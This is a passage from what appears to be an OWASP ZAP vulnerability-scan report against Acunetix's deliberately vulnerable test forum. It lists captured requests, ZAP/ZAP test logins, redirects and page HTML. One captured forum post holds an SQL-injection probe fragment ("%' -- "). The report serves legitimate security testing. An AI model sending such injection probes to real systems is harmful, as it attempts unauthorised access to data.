Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4123 |
| Response Body - size: 4,123 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4129 |
| Response Body - size: 4,129 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 333 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 4594 |
| Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 441 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 211 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Default.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 134 |
| Response Body - size: 134 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Default.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 439 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 210 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 133 |
| Response Body - size: 133 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 222 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp?tfSearch=ZAP Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 145 |
| Response Body - size: 145 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?tfSearch=ZAP">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=10 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=10">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=11 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=11">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=12 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=12">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=13 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=13">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=14 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=14">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
